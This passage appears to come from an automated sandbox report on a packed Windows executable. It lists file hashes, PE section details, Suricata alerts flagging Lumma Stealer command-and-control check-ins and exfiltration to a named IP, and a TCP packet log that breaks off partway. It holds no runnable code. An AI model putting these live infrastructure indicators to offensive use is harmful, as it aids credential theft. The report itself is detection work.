SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.575606165637
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TTsfmr1RWm.exe
File size:	2'955'776 bytes
MD5:	a2e3e7417756b4b817f2fbca4c98ec6e
SHA1:	d5b13886bab879bad11c757c9ca67169ea6a367c
SHA256:	f01386882849a80e799cdf7e4cb04708b1accb80c91687b55f63eed8729d2057
SHA512:	fd1a15ba2a71c97569efe1bae2bdf126bd30cf43a915f2dbd39d2fd5dab7324b967ad3b087105c13912224f99a989dc5bd8c8ba5a270bfc30d24871296ebe3a2
SSDEEP:	49152:sx1UyvjeVPAwHsOvgh7wIAP+YAjzQlcvUo:8UKyVPrsf7wIAPcM
TLSH:	A5D52991EC09B1CBD48B16B8947BCDC2596D02FA4B118CC7A86D78BA7D63DC116FAC34
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@...........................0.......-...@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x6fe000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F91A0BD302Ah
psubb mm5, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F91A0BD5025h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	241cb122999222daa10da39b66b37dff	False	0.9996234170751634	data	7.983589974168695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ncozhsgk	0x55000	0x2a8000	0x2a7e00	b24271ba60a65a9efdf316239a278c6d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
opgfpctb	0x2fd000	0x1000	0x400	3bcdff706680d8c8271c4321b4056b6d	False	0.8056640625	data	6.2531526669919115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x2fe000	0x3000	0x2200	c32c719a5c53ee88b17eed464b697ba5	False	0.05572150735294118	DOS executable (COM)	0.7016309679020459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T12:41:16.727748+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49724	104.21.11.101	443	TCP
2024-12-26T12:41:17.492444+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49724	104.21.11.101	443	TCP
2024-12-26T12:41:17.492444+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49724	104.21.11.101	443	TCP
2024-12-26T12:41:18.877814+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49725	104.21.11.101	443	TCP
2024-12-26T12:41:19.673938+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49725	104.21.11.101	443	TCP
2024-12-26T12:41:19.673938+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49725	104.21.11.101	443	TCP
2024-12-26T12:41:21.372815+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49732	104.21.11.101	443	TCP
2024-12-26T12:41:23.853267+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49743	104.21.11.101	443	TCP
2024-12-26T12:41:26.348435+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49749	104.21.11.101	443	TCP
2024-12-26T12:41:29.379620+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49755	104.21.11.101	443	TCP
2024-12-26T12:41:30.160370+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49755	104.21.11.101	443	TCP
2024-12-26T12:41:31.974972+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49763	104.21.11.101	443	TCP
2024-12-26T12:41:37.155820+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49777	104.21.11.101	443	TCP
2024-12-26T12:41:37.922379+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49777	104.21.11.101	443	TCP
2024-12-26T12:41:40.193540+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.6	49784	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:41:07.157066107 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:07.219983101 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.220062017 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.220076084 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.220185041 CET	49710	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:41:07.220197916 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.220212936 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.220230103 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.220321894 CET	49710	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:41:07.220402002 CET	49710	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:41:07.228461027 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.228579998 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.228657007 CET	49710	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:41:07.236834049 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.237003088 CET	443	49710	40.126.53.21	192.168.2.6
Dec 26, 2024 12:41:07.237092972 CET	49710	443	192.168.2.6	40.126.53.21
Dec 26, 2024 12:41:07.598380089 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:07.600086927 CET	49711	443	192.168.2.6	20.198.118.190
Dec 26, 2024 12:41:07.600179911 CET	49711	443	192.168.2.6	20.198.118.190
Dec 26, 2024 12:41:07.600270987 CET	49711	443	192.168.2.6	20.198.118.190
Dec 26, 2024 12:41:07.719600916 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:07.719681978 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:07.719758034 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:08.159396887 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:08.208378077 CET	49711	443	192.168.2.6	20.198.118.190
Dec 26, 2024 12:41:08.615016937 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:08.631262064 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:08.631469965 CET	49711	443	192.168.2.6	20.198.118.190
Dec 26, 2024 12:41:08.632510900 CET	49711	443	192.168.2.6	20.198.118.190
Dec 26, 2024 12:41:08.748605967 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:08.748894930 CET	49711	443	192.168.2.6	20.198.118.190
Dec 26, 2024 12:41:08.752347946 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:08.895939112 CET	49674	443	192.168.2.6	173.222.162.64
Dec 26, 2024 12:41:08.895940065 CET	49673	443	192.168.2.6	173.222.162.64
Dec 26, 2024 12:41:09.184271097 CET	443	49712	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:09.184448004 CET	49712	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:09.190021992 CET	49712	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:09.190051079 CET	443	49712	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:09.190378904 CET	443	49712	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:09.192289114 CET	443	49711	20.198.118.190	192.168.2.6
Dec 26, 2024 12:41:09.208336115 CET	49712	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:09.211160898 CET	49712	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:09.211175919 CET	443	49712	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:09.211276054 CET	49712	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:09.223993063 CET	49672	443	192.168.2.6	173.222.162.64
Dec 26, 2024 12:41:09.239609003 CET	49711	443	192.168.2.6	20.198.118.190
Dec 26, 2024 12:41:09.251343012 CET	443	49712	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:09.888842106 CET	443	49712	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:09.888925076 CET	443	49712	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:09.889013052 CET	49712	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:09.889262915 CET	49712	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:09.889291048 CET	443	49712	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:15.415419102 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:15.415452957 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:15.415541887 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:15.418943882 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:15.418957949 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:16.727504969 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:16.727747917 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:16.737431049 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:16.737452030 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:16.737833023 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:16.785825968 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:16.785825968 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:16.785932064 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:17.492456913 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:17.492549896 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:17.492623091 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:17.495201111 CET	49724	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:17.495223999 CET	443	49724	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:17.508553982 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:17.508601904 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:17.508673906 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:17.575177908 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:17.575196028 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:18.505157948 CET	49674	443	192.168.2.6	173.222.162.64
Dec 26, 2024 12:41:18.505171061 CET	49673	443	192.168.2.6	173.222.162.64
Dec 26, 2024 12:41:18.833358049 CET	49672	443	192.168.2.6	173.222.162.64
Dec 26, 2024 12:41:18.877675056 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:18.877814054 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:18.879178047 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:18.879189014 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:18.879570007 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:18.881098032 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:18.881098032 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:18.881341934 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.673945904 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.674000025 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.674035072 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.674082041 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.674093008 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.674107075 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.674166918 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.674173117 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.674231052 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.676646948 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.684540033 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.684601068 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.684655905 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.684681892 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.684766054 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.692893982 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.739545107 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.739552975 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.786438942 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.793631077 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.794984102 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:19.795015097 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:19.795130014 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:19.795794010 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:19.795805931 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:19.833386898 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.884268999 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.887902021 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.887979031 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.887984037 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.888008118 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.888091087 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.888098955 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.888194084 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.888256073 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.888314962 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.888334990 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:19.888346910 CET	49725	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:19.888353109 CET	443	49725	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:20.066915035 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:20.066956997 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:20.067059994 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:20.067341089 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:20.067359924 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:21.312330961 CET	443	49707	173.222.162.64	192.168.2.6
Dec 26, 2024 12:41:21.312426090 CET	49707	443	192.168.2.6	173.222.162.64
Dec 26, 2024 12:41:21.372420073 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:21.372814894 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:21.373783112 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:21.373792887 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:21.374053001 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:21.375174999 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:21.375423908 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:21.375462055 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:22.120368958 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:22.120440006 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:22.123336077 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:22.123346090 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:22.123605013 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:22.125327110 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:22.125387907 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:22.125397921 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:22.125554085 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:22.167334080 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:22.415785074 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:22.415893078 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:22.415977955 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:22.416058064 CET	49732	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:22.416074038 CET	443	49732	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:22.541625977 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:22.541685104 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:22.541760921 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:22.542061090 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:22.542078972 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:22.685760975 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:22.685874939 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:22.686003923 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:22.686420918 CET	49731	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:22.686429977 CET	443	49731	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:23.853121996 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:23.853266954 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:23.854650021 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:23.854657888 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:23.855196953 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:23.856360912 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:23.856513023 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:23.856561899 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:23.856682062 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:23.899373055 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:24.836558104 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:24.836675882 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:24.836743116 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:24.836910963 CET	49743	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:24.836931944 CET	443	49743	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:25.042428970 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:25.042484999 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:25.042598009 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:25.042943001 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:25.042954922 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:26.348303080 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:26.348434925 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:26.360502958 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:26.360523939 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:26.360841036 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:26.379494905 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:26.379739046 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:26.379914999 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:26.380009890 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:26.380022049 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:27.393188953 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:27.393320084 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:27.393405914 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:27.393558979 CET	49749	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:27.393573999 CET	443	49749	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:28.074322939 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:28.074373960 CET	443	49755	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:28.074476004 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:28.074734926 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:28.074748039 CET	443	49755	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:29.379451036 CET	443	49755	104.21.11.101	192.168.2.6
